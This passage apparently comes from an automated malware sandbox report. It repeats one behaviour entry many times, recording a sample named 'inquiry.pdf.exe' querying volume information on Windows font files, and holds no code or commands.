            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
